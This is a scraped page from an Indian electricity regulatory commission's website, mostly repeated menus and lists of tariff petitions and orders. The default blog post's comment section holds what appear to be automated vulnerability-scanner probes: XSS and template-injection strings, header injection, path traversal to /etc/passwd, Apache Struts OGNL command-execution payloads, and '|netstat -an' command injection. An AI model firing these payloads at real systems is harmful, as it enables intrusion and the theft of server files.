A - A A + Screen Reader Access | About Us About JERC Mission & Vision Profile of Chairman & Members Board of Honor Objectives & Functions Key Officers Public Notice Tender Vacancy Regulations General Orders Tariff Orders Andaman And Nicobar Chandigarh Dadra And Nagar Haveli Daman And Diu Goa Lakshadweep Puducherry Misc Petitions Andaman And Nicobar Chandigarh Dadra And Nagar Haveli Daman And Diu Goa Lakshadweep Puducherry PPA Andaman And Nicobar Chandigarh Dadra And Nagar Haveli Daman And Diu Goa Lakshadweep Puducherry Suo Moto Regulations Draft Regulations Current Regulations Consolidated Regulations Repealed Regulations Petitions APTEL JERC High Court Other Court State Advisory Committee State Advisory Committee SAC Members SAC Mandate Minutes of Meeting Electricity Consumer Rights CGRF CGRF Details CGRF Progress Reports Ombudsman Details Timelines CGRF Ombudsman Standard of Performance Electricity Supply Code Citizen’s Charter Current Electricity Tariff Screen Reader Access Sitemap Hello world! Regulatory Compliance and Monitoring Electricity Ombudsman Andaman and Nicobar Acts And Policy Homepage Goa Hello world! Ms. Jyoti Prasad JERC Rules By Govt of India About JERC Chandigarh Annual Reports Abstract of Regulatory Information Dadra and Nagar Haveli Utility lorem Abstract of Regulatory Information Accessibility Statement Lakshadweep Andaman and Nicobar Chairperson #381 (no title) Consumer Services Acts And Policy Puducherry Chandigarh Ms. Jyoti Prasad Sh. S.K. Chaturvedi Right To Information All Daman and Diu Dadra and Nagar Haveli Member Sh. R. K. Sharma Sh. M.K. Goel Accessibility Statement Annual Reports Daman and Diu lorem Sh. S. K. Chaturvedi Board Chairperson Terms & Conditions APTEL Goa Ms. Neerja Mathur #381 (no title) Privacy Policy CGRF Lakshadweep Ms. Jyoti Prasad Board Members PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Sh. M.K. Goel Hyperlinking Policy CGRF Puducherry Ms. Jyoti Prasad True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Sh. S.K. Chaturvedi Copyright Policy CGRF Details Ms. Neerja Mathur CGRF Progress Reports Sh. R. K. Sharma Whats New Links Petition No. 72/2012 : Petition for Power Purchase Agreement for Procurement of 5 MW from new Grid Connected Solar Project on Long Term basis (Under New Project Scheme) between Electricity Department Daman & Diu and M/s Waaree Energies Pvt Ltd. Citizen’s Charter Sh. S. K. Chaturvedi PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Petition No. 39 /2011: Determination of Tariff for 1.0 MW Power from rooftop PV & Small Solar Power Generation (RPSSGP) for supply to the Puducherry Utility by Saheli Exports Pvt. Ltd. JERC Recruitment, Control and Service Conditions of Officers and Staff Regulations 2009 Consumer Services True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Petition No. 40/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2011-12. JERC Conduct of Business Regulations 2009 Contact Us Petition No. 60/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. The Joint Electricity Regulatory Commission for the State of Goa and Union Territories (Terms and Conditions for Tariff determination from Renewable Energy Sources) Regulations 2019 – Extension regarding JERC Conduct of Business Regulations 2009 Copyright Policy Petition No. 65/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13 Petitions Tariff Order Petition No. 78/2022: Approval of Business Plan for MYT Control Period from FY 2022-23 to FY 2024-25, Filed by ED, Andaman & Nicobar Administration JERC Conduct of Business Regulations 2009 Minutes of the 17th State Advisory Committee meeting of JERC held on 14th JULY, 2020 Electricity Consumer Rights Petition No. 62/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. Petition 267/2018 :Petition for True-up of FY 2017-18, Annual Performance Review of FY 2018-19 and Multi Year Aggregate Revenue Requirement (ARR) for the Control Period of FY 2019-20 to FY 2021-22 & Tariff Proposal of FY 2019-20 of Electricity Wing of Engineering Department, Chandigarh Tariff Order Petition No 81/2022: Annual Performance Revenue for FY 2021-22, Aggregate Revenue Requirement for 3rd MYT Control Period (FY 2022-23 to FY 202425) & Determination of Retail Supply Tariff for the FY 2022-23 Screen Reader Access Sitemap Hello world! Regulatory Compliance and Monitoring Electricity Ombudsman Andaman and Nicobar Acts And Policy Home Goa Hello world! Ms. Jyoti Prasad JERC Rules By Govt of India About JERC Chandigarh Annual Reports Abstract of Regulatory Information Dadra and Nagar Haveli Utility lorem Abstract of Regulatory Information Accessibility Statement Lakshadweep Andaman and Nicobar Chairperson #381 (no title) Consumer Services Acts And Policy Puducherry Chandigarh Ms. Jyoti Prasad Sh. S.K. Chaturvedi Right To Information All Daman and Diu Dadra and Nagar Haveli Member Sh. R. K. Sharma Sh. M.K. Goel Homepage Annual Reports Daman and Diu lorem Sh. S. K. Chaturvedi Board Chairperson Accessibility Statement APTEL Goa Ms. Neerja Mathur #381 (no title) Terms & Conditions CGRF Lakshadweep Ms. Jyoti Prasad Board Members PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Sh. M.K. Goel Privacy Policy CGRF Puducherry Ms. Jyoti Prasad True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Sh. S.K. Chaturvedi Hyperlinking Policy CGRF Details Ms. Neerja Mathur CGRF Progress Reports Sh. R. K. Sharma Whats New Links Petition No. 72/2012 : Petition for Power Purchase Agreement for Procurement of 5 MW from new Grid Connected Solar Project on Long Term basis (Under New Project Scheme) between Electricity Department Daman & Diu and M/s Waaree Energies Pvt Ltd. Citizen’s Charter Sh. S. K. Chaturvedi PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Petition No. 39 /2011: Determination of Tariff for 1.0 MW Power from rooftop PV & Small Solar Power Generation (RPSSGP) for supply to the Puducherry Utility by Saheli Exports Pvt. Ltd. JERC Recruitment, Control and Service Conditions of Officers and Staff Regulations 2009 Consumer Services True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Petition No. 40/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2011-12. JERC Conduct of Business Regulations 2009 Contact Us Petition No. 60/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. The Joint Electricity Regulatory Commission for the State of Goa and Union Territories (Terms and Conditions for Tariff determination from Renewable Energy Sources) Regulations 2019 – Extension regarding JERC Conduct of Business Regulations 2009 Copyright Policy Petition No. 65/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13 Petitions Tariff Order Petition No. 78/2022: Approval of Business Plan for MYT Control Period from FY 2022-23 to FY 2024-25, Filed by ED, Andaman & Nicobar Administration JERC Conduct of Business Regulations 2009 Minutes of the 17th State Advisory Committee meeting of JERC held on 14th JULY, 2020 Electricity Consumer Rights Petition No. 62/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. Petition 267/2018 :Petition for True-up of FY 2017-18, Annual Performance Review of FY 2018-19 and Multi Year Aggregate Revenue Requirement (ARR) for the Control Period of FY 2019-20 to FY 2021-22 & Tariff Proposal of FY 2019-20 of Electricity Wing of Engineering Department, Chandigarh Tariff Order Petition No 81/2022: Annual Performance Revenue for FY 2021-22, Aggregate Revenue Requirement for 3rd MYT Control Period (FY 2022-23 to FY 202425) & Determination of Retail Supply Tariff for the FY 2022-23 Electricity Consumer Rights State Advisory Committee Hello world! Petitions Regulations Andaman and Nicobar Orders Home Goa Hello world! Ms. Jyoti Prasad Public Notice State Advisory Committee Chandigarh Sample Page State Advisory Committee Dadra and Nagar Haveli Utility lorem Suo Moto Lakshadweep Andaman and Nicobar Chairperson #381 (no title) Tariff Orders Puducherry Chandigarh Ms. Jyoti Prasad Sh. S.K. Chaturvedi Terms & Conditions Daman and Diu Dadra and Nagar Haveli Member Sh. R. K. Sharma Sh. M.K. Goel Territory wise Daman and Diu lorem Sh. S. K. Chaturvedi Board Chairperson Timelines Goa Ms. Neerja Mathur #381 (no title) Lakshadweep Ms. Jyoti Prasad Board Members PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Sh. M.K. Goel Puducherry Ms. Jyoti Prasad True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Sh. S.K. Chaturvedi Ms. Neerja Mathur Sh. R. K. Sharma Whats New Links Petition No. 72/2012 : Petition for Power Purchase Agreement for Procurement of 5 MW from new Grid Connected Solar Project on Long Term basis (Under New Project Scheme) between Electricity Department Daman & Diu and M/s Waaree Energies Pvt Ltd. Sh. S. K. Chaturvedi PUBLIC NOTICE Petition No. 89/2022: Petition under Section 61, 62 and 64 of the Electricity Act, 2003 read with all applicable Regulations, under the JERC (Generation, Transmission and Distribution Multi Year Tariff) Regulations, 2021 for Review of ARR of FY 2022-23 based on revised estimates and Determination of ARR & Tariff for FY 2023-24 filed by DNHDDPDCL Distribution business of Dadra and Nagar Haveli and Daman and Diu. Petition No. 39 /2011: Determination of Tariff for 1.0 MW Power from rooftop PV & Small Solar Power Generation (RPSSGP) for supply to the Puducherry Utility by Saheli Exports Pvt. Ltd. JERC Recruitment, Control and Service Conditions of Officers and Staff Regulations 2009 True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Periodand Determination of Retail Tariff for the FY 2022-23 Petition No. 40/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2011-12. JERC Conduct of Business Regulations 2009 Petition No. 60/2011: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. The Joint Electricity Regulatory Commission for the State of Goa and Union Territories (Terms and Conditions for Tariff determination from Renewable Energy Sources) Regulations 2019 – Extension regarding JERC Conduct of Business Regulations 2009 Petition No. 65/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13 Petitions Tariff Order Petition No. 78/2022: Approval of Business Plan for MYT Control Period from FY 2022-23 to FY 2024-25, Filed by ED, Andaman & Nicobar Administration JERC Conduct of Business Regulations 2009 Minutes of the 17th State Advisory Committee meeting of JERC held on 14th JULY, 2020 Petition No. 62/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. Petition 267/2018 :Petition for True-up of FY 2017-18, Annual Performance Review of FY 2018-19 and Multi Year Aggregate Revenue Requirement (ARR) for the Control Period of FY 2019-20 to FY 2021-22 & Tariff Proposal of FY 2019-20 of Electricity Wing of Engineering Department, Chandigarh Tariff Order Petition No 81/2022: Annual Performance Revenue for FY 2021-22, Aggregate Revenue Requirement for 3rd MYT Control Period (FY 2022-23 to FY 202425) & Determination of Retail Supply Tariff for the FY 2022-23 JERC Conduct of Business Regulations 2009 Regulations Minutes of the 16th State Advisory Committee meeting of JERC held on 05th NOVEMBER, 2020 Petition No. 63/2012: Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. Petition No 41/2020: Petition for Annual Performance Review for FY 2020-21 and ARR & Tariff Proposal for FY 2021-22 Order Review Petition No. 82/2022: Review of Tarif Order dated 31.03.2022 issued by the Hon’ble Commission on True-up for FY 2020-21, Annual Performance Review for FY 2021-22 and Aggregate Revenue Requirement (ARR) 3rd Control Period and determination of Retail Tariff for the FY 2022-23 in Petition No. 70/2021 for the Electricity Department, Government of Puducherry. JOINT ELECTRICITY REGULATORY COMMISSION for the state of Goa and Union Territories-Case No. 0P-1/2009 In the matter of Aggregate Revenue Requirement for (ARR) and Retail Tariff for the Electricity Department, Puducherry for the financial year 2009-10. JERC Establishment of Forum for Redressal of Grievances of Consumers Regulations 2009 Corrigendum in respect of Joint Electricity Regulatory Commission (Consumer Grievances Redressal Forum and Ombudsman) Regulations, 2019 Minutes of the 15th State Advisory Committee meeting of JERC held on 26th NOVEMBER, 2019 Petition No.64/2012 : Aggregate Revenue Requirement (ARR) and Tariff Petition for FY 2012-13. Petition No. /2014 : APPLICATION ON BEHALF OF OBJECTOR FOR REVIEW OF ORDERS DATED 24.06.2014 PASSED BY HON’BLE JOINT ELECTRICITY REGULATORY COMMISSION INTERIM ORDER Petition No. 77/2022:Petition for approval of long-term Procurement of Power by ED, Govt. of Goa from SECI for 150 MW Re- Hybrid (Wind, Solar & BESS) Power Project. Public Notice JOINT ELECTRICITY REGULATORY COMMISSION for the State of Goa and Union Territories Petition No. 14/2010 Date of Order 1st November, 2010 Aggregate Revenue Requirement (ARR) and Retail Tariff for the Electricity Department, Government of Dadra & Nagar Haveli for the Financial Year 2010-11 JERC Establishment of Forum for Redressal of Grievances of Consumers Regulations 2009 current reg Hello world! Welcome to WordPress. This is your first post. Edit or delete it, then start writing! 44 thoughts on “Hello world!” “‘> Reply _q=random(X140414570813248Y2_2Z) Reply ‘ onEvent=X140414570813248Y2_2Z Reply ” onEvent=X140414570813248Y2_2Z Reply javascript:qxss(X140414570813248Y2_2Z); Reply “> Reply 1″‘> Reply z–> Reply 1 _q_q=random(l8ncgM2p) Reply Reply ” SRC=//localhost/jke0Xmh6E> Reply “‘><qss1fFg8058=7;//< Reply 1″> Reply BODY{background:url(“javascript:qssqg63Y9IO=7”)} Reply qss1GsnyPrA=7 Reply %3cscript z%3e_q(y)%3c/script%3e Reply <script src=http://localhost/j Reply qss{{q=(2*2.0)}}qss Reply {{333*334}} Reply q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA Reply q Qualys_resp_hdr_injection: Vulnerable Reply q Qualys_resp_hdr_injection: Vulnerable Reply qualyswasesi Reply 1′ Reply ;– Reply # Reply /* Reply “ Reply , Reply ( Reply 1e309 Reply /../../../../../../../etc/passwd Reply ../../../../../../../etc/passwd Reply //..//..//..//..//..//..//..//etc/passwd Reply //….//….//….//….//….//….//….//etc/passwd Reply ../../../../../../../Windows/System32/drivers/etc/hosts Reply php://filter/read=string.rot13/resource=/etc/passwd Reply ….//….//….//….//….//….//etc/passwd Reply %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Reply %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Reply %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} Reply a(){}phpinfo(); function a Reply |netstat -an Reply http://rfitest/ Reply Leave a Reply Cancel replyYour email address will not be published. Required fields are marked *Comment * Name * Email * Website Save my name, email, and website in this browser for the next time I comment.
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA Reply
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Reply
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Reply
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} Reply
“‘>
_q=random(X140414570813248Y2_2Z)
‘ onEvent=X140414570813248Y2_2Z
” onEvent=X140414570813248Y2_2Z
javascript:qxss(X140414570813248Y2_2Z);
“>
1″‘>
z–>
1 _q_q=random(l8ncgM2p)
” SRC=//localhost/jke0Xmh6E>
“‘><qss1fFg8058=7;//<
1″>
BODY{background:url(“javascript:qssqg63Y9IO=7”)}
qss1GsnyPrA=7
%3cscript z%3e_q(y)%3c/script%3e
<script src=http://localhost/j
qss{{q=(2*2.0)}}qss
{{333*334}}
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
q
Qualys_resp_hdr_injection: Vulnerable
q
Qualys_resp_hdr_injection: Vulnerable
qualyswasesi
1′
;–
#
/*
“
,
(
1e309
/../../../../../../../etc/passwd
../../../../../../../etc/passwd
//..//..//..//..//..//..//..//etc/passwd
//….//….//….//….//….//….//….//etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
php://filter/read=string.rot13/resource=/etc/passwd
….//….//….//….//….//….//etc/passwd
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
a(){}phpinfo(); function a
|netstat -an
http://rfitest/